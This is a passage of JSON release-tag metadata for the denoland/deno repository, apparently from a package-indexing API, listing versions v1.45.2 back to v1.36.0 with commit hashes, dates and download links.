nd%2Fdeno/tags/v1.45.2/manifests"},{"name":"v1.45.1","sha":"c841d163e3dc344c06f10579672cc5e2b095933f","kind":"commit","published_at":"2024-07-11T18:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1/manifests"},{"name":"v1.45.0","sha":"04ff5c731d55f2402e7b08e378eaf6e5a5a4d961","kind":"commit","published_at":"2024-07-10T22:08:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0/manifests"},{"name":"v1.44.4","sha":"892e7c20ac6e7bc0601f4c23e64f43187c1b8479","kind":"commit","published_at":"2024-06-19T16:28:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4/manifests"},{"name":"v1.44.3","sha":"ab2ab0f7fc4e7bda16544ef96a5e6ba114e799b5","kind":"commit","published_at":"2024-06-19T00:19:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3/manifests"},{"name":"v1.44.2","sha":"9ca1320746072001feab9f6a26e9c1518609bd7b","kind":"commit","published_at":"2024-06-13T00:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2/manifests"},{"name":"v1.44.1","sha":"e02a32be2797f7c107d19da8bf2aff5bbcd97bad","kind":"commit","published_at":"2024-06-05T23:05:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1/manifests"},{"name":"v1.44.0","sha":"f3ffffc682604349b96dbe4ad33daa5dd1a09f63","kind":"commit","published_at":"2024-05-30T05:58:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0/manifests"},{"name":"v1.43.6","sha":"7df3d5aeec14f24e5fdec1e1e6f5739f1fbeebbe","kind":"commit","published_at":"2024-05-21T23:34:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6/manifests"},{"name":"v1.43.5","sha":"a13c4531fd2c08617767cc8a0788b9e20ac27d45","kind":"commit","published_at":"2024-05-18T00:22:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5/manifests"},{"name":"v1.43.4","sha":"d64921c1906ee1ac39230c16abe9ff8c546bd645","kind":"commit","published_at":"2024-05-16T23:28:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4/manifests"},{"name":"v1.43.3","sha":"d6ad253882a6c066e0c673ff64e6554a37bb3487","kind":"commit","published_at":"2024-05-10T20:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3/manifests"},{"name":"v1.43.2","sha":"acd75bbd75fdf46c213d7b21093e09349318da5d","kind":"commit","published_at":"2024-05-08T22:21:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2/manifests"},{"name":"v1.43.1","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1/manifests"},{"name":"v1.43.0","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0/manifests"},{"name":"v1.42.4","sha":"7cb23c5e3ee0b6c416f4c0e34c7c63fdf5024138","kind":"commit","published_at":"2024-04-16T00:17:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4/manifests"},{"name":"v1.42.3","sha":"a64a257024c9933d90494613ac6b302cc69df6fa","kind":"commit","published_at":"2024-04-12T00:54:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3/manifests"},{"name":"v1.42.2","sha":"04c0a4cbf7c00811d3ace3184c1cb8597a0e88f1","kind":"commit","published_at":"2024-04-11T06:39:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2/manifests"},{"name":"v1.42.1","sha":"08f0613b390b289d07c6ea165bed0518809b34e8","kind":"commit","published_at":"2024-04-01T06:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1/manifests"},{"name":"v1.42.0","sha":"9c6eca1064de029e560377bef831e69d22c5c00b","kind":"commit","published_at":"2024-03-28T00:47:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0/manifests"},{"name":"v1.41.3","sha":"0d7662e1556a60bcc4b7075752fb2c2842b1afea","kind":"commit","published_at":"2024-03-14T18:13:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3/manifests"},{"name":"v1.41.2","sha":"6d062cf0c79158a8c0c8a136c945c3eab2af8b50","kind":"commit","published_at":"2024-03-08T07:32:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2/manifests"},{"name":"v1.41.1","sha":"8ccb9e954548d1a4d3ccbe065c28d6067d3fda03","kind":"commit","published_at":"2024-03-01T00:25:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1/manifests"},{"name":"v1.41.0","sha":"118445103b019fbeb50eadc8d09d450fa8c33eee","kind":"commit","published_at":"2024-02-22T01:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0/manifests"},{"name":"v1.40.5","sha":"2c97831fec0d335a474c4a599a5df345a23ef036","kind":"commit","published_at":"2024-02-15T05:22:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5/manifests"},{"name":"v1.40.4","sha":"49214d309fc373a80a02f57545131b15f7813a98","kind":"commit","published_at":"2024-02-08T11:05:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4/manifests"},{"name":"v1.40.3","sha":"887fd59486325ad99c183955b35fec07fd45516c","kind":"commit","published_at":"2024-02-01T06:27:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3/manifests"},{"name":"v1.40.2","sha":"9a55a72cf195b2d5cee1e8598c7d28e4b1e8013a","kind":"commit","published_at":"2024-01-26T16:36:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2/manifests"},{"name":"v1.40.1","sha":"b003ecec64782ebe3aa7e5b17728df2e6a6e2e39","kind":"commit","published_at":"2024-01-25T15:22:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1/manifests"},{"name":"v1.40.0","sha":"9e575a286269c38c1af0a918a2a4ea4639a3004b","kind":"commit","published_at":"2024-01-25T02:48:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0/manifests"},{"name":"v1.39.4","sha":"be4d0b7ad306312b0c01e1abc345e54b4e589ab6","kind":"commit","published_at":"2024-01-13T23:52:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4/manifests"},{"name":"v1.39.3","sha":"aa23ccd1ae3b0c188336c0fd1d84deaed5fe13af","kind":"commit","published_at":"2024-01-12T14:58:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3/manifests"},{"name":"v1.39.2","sha":"6af25c0592af46781b63bd43cf12d39b8aa61d09","kind":"commit","published_at":"2024-01-04T20:40:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2/manifests"},{"name":"v1.39.1","sha":"68254ddc2060c32e6daa55aa3b33f82739655705","kind":"commit","published_at":"2023-12-21T15:46:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1/manifests"},{"name":"v1.39.0","sha":"5b96f7bf21392620f0047687ec3b75b25b7ea9f2","kind":"commit","published_at":"2023-12-13T21:52:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0/manifests"},{"name":"v1.38.5","sha":"172e5f0a0cea97ba27f7f6e46fb8f9b31f8dbbc6","kind":"commit","published_at":"2023-12-05T22:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5/manifests"},{"name":"v1.38.4","sha":"8c07f52a7cbd6117e968383c94fe25b91c4c9242","kind":"commit","published_at":"2023-11-30T19:12:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4/manifests"},{"name":"v1.38.3","sha":"3193e93912f87dd05871abb61f54297368f3f265","kind":"commit","published_at":"2023-11-24T03:49:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3/manifests"},{"name":"v1.38.2","sha":"118be11e8c64fd6c4afb352b5095c02fa5571e8e","kind":"commit","published_at":"2023-11-17T05:57:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2/manifests"},{"name":"v1.38.1","sha":"0e7ad0388be7413db6ded8b60d5ae5d7cc0ffda0","kind":"commit","published_at":"2023-11-10T11:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1/manifests"},{"name":"v1.38.0","sha":"41877a0b3735d52db8b4f5047b1d4d61e37ba585","kind":"commit","published_at":"2023-11-02T01:01:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0/manifests"},{"name":"v1.37.2","sha":"7282994df4f9c1748affa7c4455eea46a9e1a2e0","kind":"commit","published_at":"2023-10-13T00:14:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2/manifests"},{"name":"v1.37.1","sha":"72c276d61a8b43abd3dbcf4f1440a2bf133fe0d2","kind":"commit","published_at":"2023-09-27T06:24:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1/manifests"},{"name":"v1.37.0","sha":"997aa604dfd50c0f0ec6fd4db16b5034d2cfd726","kind":"commit","published_at":"2023-09-19T20:29:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0/manifests"},{"name":"v1.36.4","sha":"c0617d11f6391f1b1b3afffe0152c73b5989ab80","kind":"commit","published_at":"2023-09-01T14:15:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4/manifests"},{"name":"v1.36.3","sha":"55029c72618323014aa49317de9124375adeb13f","kind":"commit","published_at":"2023-08-24T16:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3/manifests"},{"name":"v1.36.2","sha":"a7f5244a72cc6c00949c02a180d0d9cdf2bf1672","kind":"commit","published_at":"2023-08-21T13:39:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2/manifests"},{"name":"v1.36.1","sha":"9f1455b75087e9e41a995bbb6a8a7f3059a0185a","kind":"commit","published_at":"2023-08-10T10:53:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1/manifests"},{"name":"v1.36.0","sha":"6ba245fe2570b29e35a4fd296a196a58870b1e3c","kind":"commit","published_at":"2023-08-03T16:26:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0/